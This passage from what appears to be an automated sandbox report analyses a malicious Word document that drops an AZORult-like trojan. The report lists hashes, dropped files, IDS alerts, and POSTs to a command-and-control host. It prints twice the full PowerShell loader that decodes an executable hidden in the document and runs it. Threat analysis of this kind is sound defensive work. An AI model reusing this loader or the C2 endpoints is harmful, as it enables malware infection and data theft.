"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Hooks API calls
File Details
aa317af7a2307040e7fd3a4a1df33430.doc
- Filename
- aa317af7a2307040e7fd3a4a1df33430.doc
- Size
- 1.3MiB (1369092 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>
- Architecture
- WINDOWS
- SHA256
- e82a7f1a1a5a72cec760b74f1f76fe535c6934a09fedf955559596ce7354e075
- MD5
- aa317af7a2307040e7fd3a4a1df33430
- SHA1
- 93c6fd4e3698d626a8ba78016151d9ca74390b85
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\aa317af7a2307040e7fd3a4a1df33430.doc"
(PID: 556)
-
powershell.exe
Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');
(PID: 2904)
-
TAMOIV.exe
(PID: 3716)
28/67
- TAMOIV.exe (PID: 2192) 28/67
-
TAMOIV.exe
(PID: 3716)
28/67
- DW20.EXE -x -s 1420 (PID: 2540)
-
powershell.exe
Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe');
(PID: 2904)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
eualube.com
OSINT |
104.168.177.9
TTL: 14399 |
NetEarth One, Inc. | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
104.168.177.9 |
80
TCP |
tamoiv.exe PID: 2192 |
United States |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
104.168.177.9:80 (eualube.com) | POST | eualube.com/conto/gate.php | POST /conto/gate.php HTTP/1.1
Host: eualube.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Referer: eualube.com/conto/gate.php
Connection: close
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0 More Details |
104.168.177.9:80 (eualube.com) | POST | eualube.com/conto/gate.php | POST /conto/gate.php HTTP/1.1
Host: eualube.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Referer: eualube.com/conto/gate.php
Connection: close
Content-Length: 674
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0 More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no accept headers | 2022985 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant Checkin | 2821358 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no accept headers | 2022985 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | CrowdStrike Azorult V1 traffic | 181717601 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant Checkin | 2821358 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | CrowdStrike Azorult V1 traffic | 181717601 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
TAMOIV.exe
- Size
- 1.2MiB (1246720 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.Agent" (28/67)
- Runtime Process
- TAMOIV.exe (PID: 3716)
- MD5
- 075a69bf33193c1aa225d32ca3aa3aa5
- SHA1
- d7437e6f54930f17e3f648cde84fe262a1d6b6d7
- SHA256
- 0e8b7e8d05859698f23128f04c92894bacf552380b3ff63159ab76cabda9c7d7
-
-
Informative Selection 1
-
-
Desktop
- Size
- Unknown (0 bytes)
- Type
- empty
- Runtime Process
- TAMOIV.exe (PID: 2192)
-
-
Informative 11
-
-
aa317af7a2307040e7fd3a4a1df33430.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 17 00:42:47 2018, mtime=Sat Feb 17 00:42:47 2018, atime=Sat Feb 17 00:43:00 2018, length=1369092, window=hide
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- f59c0e20277f73228b7afe46eb63c727
- SHA1
- 3a7bc4ab344ecb596f09a36808c9681e57c69e63
- SHA256
- c1c5e1db0244dd2e228b4dd0b2a0016658d7a2dd8fd0b1615ddc7f661af25162
-
index.dat
- Size
- 193B (193 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- 03e144445f9daf041b6af59e656f3241
- SHA1
- d865c1169b394fa2afe3d823fed6c37a134fb76a
- SHA256
- 565bae6448783b851a64009c059dcef861713018957b6e209b5b17ebaca40e40
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- 6d975baa62b560be2a37a88a814f3baa
- SHA1
- 3a0591d8c5d95c79d0ce2cd32c471804594a73f5
- SHA256
- d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7
-
6LACNQ6NXQXSDUZITFDL.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2904)
- MD5
- b83e99aca96faa3715ae185347f666ff
- SHA1
- 0516d2379bbf9e75418691efe5e960917450823f
- SHA256
- 46c73c03bedbe8eb14fdc3537e59fc81fdf5948494a694fc759bd00472a1f71d
-
aa317af7a2307040e7fd3a4a1df33430.doc.lnk
- Size
- 649B (649 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Sat Feb 17 00:42:47 2018, mtime=Sat Feb 17 00:42:47 2018, atime=Sat Feb 17 00:43:00 2018, length=1369092, window=hide
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- dc6dd47355e3dc2264af7f7b8b42f30e
- SHA1
- 5f80d769d37be02d7829679544e81389d2ef0406
- SHA256
- 34c7cf4ac47101ca7a4cc4d4b79116528969a9bf05c459d96d29b5c0b8ca461e
-
~WRD0000.tmp
- Size
- 107KiB (109568 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa, Author: Caleb Cheng, Template: Normal, Last Saved By: caive, Revision Number: 60, Name of Creating Application: Microsoft Office Word, Total Editing Time: 46:00, Create Time/Date: Sat Feb 3 02:00:00 2018, Last Saved Time/Date: Fri Feb 16 01:17:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- 93e601b6b19e4dc89540cde674f16845
- SHA1
- 66854d41905736b7d7b8d54429c0c8ae5d678f17
- SHA256
- 8e95654a0c534a8274b115f3d74ce583842df7ce5ab6d54dcff67fcb5f4d1beb
-
~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$317af7a2307040e7fd3a4a1df33430.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 556)
- MD5
- 6d975baa62b560be2a37a88a814f3baa
- SHA1
- 3a0591d8c5d95c79d0ce2cd32c471804594a73f5
- SHA256
- d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7
-
MSO3081.acl
- Size
- 37KiB (37762 bytes)
- Type
- data
- MD5
- 65ab254f8ba1839c4e86550e83a99bfd
- SHA1
- 3afc326a413163ac3c6f28cc716202a871156235
- SHA256
- 1b3df51f8e319440b95d46863542980b034558917d4047b3657fba436ca23e8d
-
~WRD0002.tmp
- Size
- 107KiB (109568 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa, Author: Caleb Cheng, Template: Normal, Last Saved By: caive, Revision Number: 60, Name of Creating Application: Microsoft Office Word, Total Editing Time: 48:00, Create Time/Date: Sat Feb 3 02:00:00 2018, Last Saved Time/Date: Fri Feb 16 01:17:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
- MD5
- 5818b38d07f1a54b1cf2d77edf909a9f
- SHA1
- 079bc8e9f572b4900c095c6accf1358acb5a8505
- SHA256
- 4b1475c623e881c8496ed41da295294b657cf72e66eaa4d8c9364a528d223abe
-
1571463673.cvr
- Size
- 2KiB (2040 bytes)
- Type
- data
- MD5
- 76334ff4fca0ddf0471e50e1f89063f0
- SHA1
- 9bbb1ced70e63ea9d81148d97e7acf10230ddfa1
- SHA256
- 1d2ee8d47d5986e38cbd2feadeeed761a713d9d4c9273f1bc680cb96e17b411e
-
Notifications
-
Runtime
- A process crash was detected during the runtime analysis
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Extracted file "~$317af7a2307040e7fd3a4a1df33430.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7/analysis/1518799770/")
- Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/8e95654a0c534a8274b115f3d74ce583842df7ce5ab6d54dcff67fcb5f4d1beb/analysis/1518799771/")
- Extracted file "~WRD0002.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/4b1475c623e881c8496ed41da295294b657cf72e66eaa4d8c9364a528d223abe/analysis/1518799772/")
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)